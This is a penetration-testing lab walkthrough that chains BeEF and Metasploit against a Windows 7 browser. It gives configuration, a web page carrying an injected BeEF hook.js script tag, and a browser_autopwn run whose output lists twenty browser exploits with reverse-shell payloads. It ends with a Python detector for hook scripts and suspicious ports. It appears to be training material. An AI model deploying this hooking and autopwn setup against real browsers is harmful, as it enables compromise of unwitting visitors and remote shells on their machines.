[Additional exercise] - As of 30 December 2015 this exercise does not run correctly.
BeEF + MSF integration
Let's attempt a browser attack using BeEF together with MSF and understand the process by which a remote shell is obtained.
■ Systems used
- Kali Linux
- Windows 7 (using the Chrome browser)
(Windows 7)
■ Checklist
Turn off the Windows 7 firewall.
In the Java security settings, register 192.168.20.50 and 192.168.20.50:8080 as trusted sites.
(Kali Linux)
① Check the BeEF configuration and change it if necessary
[TERM1] First terminal
# vi /usr/share/beef-xss/config.yaml
..... (omitted) .....
/metasploit                 <--- search for this in vi

# You may override default extension configuration parameters here
extension:
    requester:
        enable: true
    proxy:
        enable: true
        key: "beef_key.pem"
        cert: "beef_cert.pem"
    metasploit:
        enable: true        <--- changed (false -> true)
    social_engineering:
        enable: true
    evasion:
        enable: false
    console:
        shell:
            enable: false
    ipec:
        enable: true # this is still experimental, we're working on it..
    dns:
        enable: true
-> This is at the very bottom of the file (line 155).
# vi /usr/share/beef-xss/extensions/metasploit/config.yaml
#
#   Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
#   Browser Exploitation Framework (BeEF) - http://beefproject.com
#   See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=IP Pass=abc123
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "127.0.0.1"            # if needed: 192.168.20.50
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            # if you need "ssl: true" make sure you start msfrpcd with "SSL=y", like:
            # load msgrpc ServerHost=IP Pass=abc123 SSL=y
            ssl: false
            ssl_version: 'TLSv1'
            ssl_verify: true
            callback_host: "127.0.0.1"   # if needed: 192.168.20.50
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [
              {os: 'osx', path: '/opt/local/msf/'},
              {os: 'livecd', path: '/opt/metasploit-framework/'},
              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
              {os: 'bt5', path: '/opt/framework3/msf3/'},
              {os: 'backbox', path: '/opt/backbox/msf/'},
              {os: 'kali', path: '/usr/share/metasploit-framework/'},
              {os: 'pentoo', path: '/usr/lib/metasploit'},
              {os: 'win', path: 'c:\\metasploit-framework\\'},
              {os: 'custom', path: ''}
            ]
② Load the msgrpc plugin
# msfconsole
(msfconsole ASCII-art banner omitted)

       =[ metasploit v4.11.5-2015121501                   ]
+ -- --=[ 1517 exploits - 871 auxiliary - 256 post        ]
+ -- --=[ 436 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > load msgrpc Pass=abc123
[*] MSGRPC Service:  127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc
-> If Pass=abc123 is not given, a random password is generated every time the msgrpc plugin is loaded.
-> If a random password was generated, the pass field in /usr/share/beef-xss/extensions/metasploit/config.yaml must be changed to that random password before msgrpc is used.
-> To avoid this hassle, append Pass=abc123 when loading msgrpc.
-> The msgrpc plugin file can be found at the following location.
# cd /usr/share/metasploit-framework/plugins
# ls
msgrpc.rb
③ Run BeEF
# beef-xss
or
# /usr/share/beef-xss/beef -x &
# firefox http://192.168.20.50:3000/ui/authentication &
[TERM2] Second terminal
# cd /usr/share/beef-xss
# ./beef -x
[11:39:09][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[11:39:09][*] Browser Exploitation Framework (BeEF) 0.4.6.1-alpha
[11:39:09]    |   Twit: @beefproject
[11:39:09]    |   Site: http://beefproject.com
[11:39:09]    |   Blog: http://blog.beefproject.com
[11:39:09]    |_  Wiki: https://github.com/beefproject/beef/wiki
[11:39:09][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[11:39:09][*] Successful connection with Metasploit.
[11:39:14][*] Loaded 292 Metasploit exploits.
[11:39:14][*] Resetting the database for BeEF.
[11:39:16][*] BeEF is loading. Wait a few seconds...
[11:39:31][*] 13 extensions enabled.
[11:39:31][*] 532 modules enabled.
[11:39:31][*] 3 network interfaces were detected.
[11:39:31][+] running on network interface: 127.0.0.1
[11:39:31]    |   Hook URL: http://127.0.0.1:3000/hook.js
[11:39:31]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[11:39:31][+] running on network interface: 192.168.10.50
[11:39:31]    |   Hook URL: http://192.168.10.50:3000/hook.js
[11:39:31]    |_  UI URL:   http://192.168.10.50:3000/ui/panel
[11:39:31][+] running on network interface: 192.168.20.50
[11:39:31]    |   Hook URL: http://192.168.20.50:3000/hook.js
[11:39:31]    |_  UI URL:   http://192.168.20.50:3000/ui/panel
[11:39:31][*] RESTful API key: a35d98ed0dcc5c8509615ec87f1635529648cba3
[11:39:31][*] HTTP Proxy: http://127.0.0.1:6789
[11:39:31][*] DNS Server: 127.0.0.1:5300 (udp)
[11:39:31]    |   Upstream Server: 8.8.8.8:53 (udp)
[11:39:31]    |_  Upstream Server: 8.8.8.8:53 (tcp)
[11:39:31][*] BeEF server started (press control+c to stop)
-> If it started normally, the message "BeEF server started (press control+c to stop)" appears.
-> Note the Hook URL and the UI URL.
④ Create the hooked web page
[TERM3] Third terminal
When creating the hooked web page, the page used in the earlier exercise can be reused.
# vi /var/www/html/index.html
<html>
<title> Pentesting</title>
<head> Penetration testing with Kali Linux </head>
<body>
<script src="http://192.168.20.50:3000/hook.js"></script>
<img src="http://d.ibtimes.co.uk/en/full/1427093/anonymous-isis-bitcoin-opisis.jpg?w=736">
</body>
</html>
-> The URL in <img src> was taken from a Google image search result (for "anonymous").
or
<HTML>
<BODY>
<CENTER><H1> It works! </H1></CENTER>
<script src="http://192.168.20.50:3000/hook.js"></script>
<P>This is the default web page for this server.</P>
<P>The Web Server software is running but no content has been added, yet.</P>
</BODY>
</HTML>
⑤ Start the apache2 service
# service apache2 restart
⑥ Check the apache2 service
# service apache2 status
● apache2.service - LSB: Apache2 web server
   Loaded: loaded (/etc/init.d/apache2)
   Active: active (running) since Wed 2015-12-30 10:21:08 KST; 4s ago
  Process: 1864 ExecStart=/etc/init.d/apache2 start (code=exited, status=0/SUCCESS)
   CGroup: /system.slice/apache2.service
           ├─1885 /usr/sbin/apache2 -k start
           ├─1889 /usr/sbin/apache2 -k start
           ├─1890 /usr/sbin/apache2 -k start
           ├─1891 /usr/sbin/apache2 -k start
           ├─1892 /usr/sbin/apache2 -k start
           ├─1893 /usr/sbin/apache2 -k start
           └─1894 /usr/sbin/apache2 -k start

Dec 30 10:21:08 kali apache2[1864]: Starting web server: apache2.
⑦ Open the BeEF UI in Firefox.
# firefox http://192.168.20.50:3000/ui/panel &
Login ID/password
ID: beef
PASS: beef
(Windows 7)
⑧ From Windows, connect to the 192.168.20.50 site.
Using the Chrome browser, open the following site.
- http://192.168.20.50
The browser is then hooked.
(Kali Linux)
⑨ Check the list of Metasploit modules loaded in BeEF
■ Check the victim system's browser information.
Hooked Browsers > Online Browsers > 192.168.20.50 > 192.168.20.202
Details tab > "Category: Browser" > check the "Browser UA String" field.
Browser UA String: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
■ Check the list of loaded Metasploit modules.
Hooked Browsers > Online Browsers > 192.168.20.50 > 192.168.20.202
Commands tab > Module Tree > Metasploit (583)
Check the list of loaded Metasploit modules
⑩ Run autopwn
[TERM1] First terminal
msf > search autopwn

Matching Modules
================

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/server/browser_autopwn                    normal  HTTP Client Automatic Exploiter
   auxiliary/server/browser_autopwn2  2015-07-05       normal  HTTP Client Automatic Exploiter 2 (Browser Autopwn)
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

msf auxiliary(browser_autopwn) > set LHOST 192.168.20.50
LHOST => 192.168.20.50
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.20.50
SRVHOST => 192.168.20.50
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST    192.168.20.50    yes       The IP address to use for reverse-connect payloads
   SRVHOST  192.168.20.50    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] Setup
[*] Starting exploit modules on host 192.168.20.50...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/UqUY
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/oXYTnoHftX
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/QnfPsrs
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/wgupGPJiQjLo
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/SLiBeHzfmtIyI
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/kqeTeddw
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/wgeUVsbUeAM
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/sDkCueKug
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/NeianHITATMi
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/mRmRngPFvtJk
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/xUwLHVJ
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/wlVjIArnOSoK
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/EJTBnigv
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/jStcaXwtjFBHe
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/wgwaXjOzG
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/hEZoSgmSh
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/xxuENMVhmF
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/nZmi
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/yDBAQiRN
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/LxqBXAzEx
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.20.50:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.20.50:6666
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.20.50:7777
[*] Starting the payload handler...
[*] --- Done, found 20 exploit modules

[*] Using URL: http://192.168.20.50:8080/
[*] Server started.
-> This takes a while (about 2 to 5 minutes).
-> When it has started successfully, the message "Server started." is shown.
⑪ Redirect the client's browser to the hooked web page
In the BeEF UI in the browser:
Hooked Browsers > Online Browsers > 192.168.20.50 > 192.168.20.202
Commands tab > Module Tree > Browser > Hooked Domain
Select Redirect Browser
Enter the following in the Redirect Browser tab
- Redirect URL : http://192.168.20.50:8080
- Click "Execute" at the bottom right
(Windows 7)
If you check the web browser, a screen like the following should appear.
(Kali Linux)
[TERM1] First terminal
-> A message should appear saying that a session has been opened.
-> As of 30 December 2015, testing against
- the latest Firefox
- the latest Chrome
- IE 8
shows that no shell connection is actually being established.
-> This part will need to be tested again after Metasploit has been updated.
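From the defender's side, the lab above leaves two observable traces: the injected hook.js script tag in the served page, and the hooked browser's requests to the BeEF port (3000) and the autopwn listener (8080). The following is an added example, not part of the original write-up, that checks a page and a proxy log for exactly those indicators; the sample HTML and log lines are constructed, and the paths, ports and addresses are the ones used in this lab.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from the lab write-up: BeEF serves its hook script as /hook.js
# on port 3000, and browser_autopwn listened on port 8080 of the same host.
HOOK_PATH = "/hook.js"
SUSPICIOUS_PORTS = {3000, 8080}

# Constructed sample data: the hooked index.html from the lab plus three proxy
# log lines (combined log format with full URLs, as a forward proxy records them).
SAMPLE_HTML = ('<html><body><h1>It works!</h1><script src="/static/app.js"></script>'
               '<script src="http://192.168.20.50:3000/hook.js"></script></body></html>')
SAMPLE_LOG = """\
192.168.20.202 - - [30/Dec/2015:10:25:01 +0900] "GET http://192.168.20.50/ HTTP/1.1" 200 512
192.168.20.202 - - [30/Dec/2015:10:25:02 +0900] "GET http://192.168.20.50:3000/hook.js HTTP/1.1" 200 7321
192.168.20.202 - - [30/Dec/2015:10:27:40 +0900] "GET http://192.168.20.50:8080/ HTTP/1.1" 200 2048"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

class _ScriptSrcCollector(HTMLParser):
    # Collects the src attribute of every <script> tag in a document.
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.srcs += [v for k, v in attrs if k == "src" and v]

def find_hook_scripts(html, trusted_hosts=()):
    # Script srcs that load /hook.js from a host outside trusted_hosts. Relative
    # srcs have no hostname and are treated as the site's own scripts.
    collector = _ScriptSrcCollector()
    collector.feed(html)
    return [s for s in collector.srcs
            if (u := urlparse(s)).hostname and u.hostname not in trusted_hosts
            and u.path.endswith(HOOK_PATH)]

def flag_proxy_log(lines):
    # (client_ip, reason, url) for hook.js fetches and for requests to the BeEF or
    # autopwn port; lines that do not match the log format are skipped, not guessed.
    alerts = []
    for m in filter(None, map(LOG_RE.match, lines)):
        u = urlparse(m["url"])
        if u.path.endswith(HOOK_PATH):
            alerts.append((m["ip"], "beef-hook-fetch", m["url"]))
        elif u.port in SUSPICIOUS_PORTS:
            alerts.append((m["ip"], "suspicious-port", m["url"]))
    return alerts
```

The port check is deliberately second: a hook.js fetch is the stronger signal, while bare traffic to 3000 or 8080 only points at a client worth a closer look.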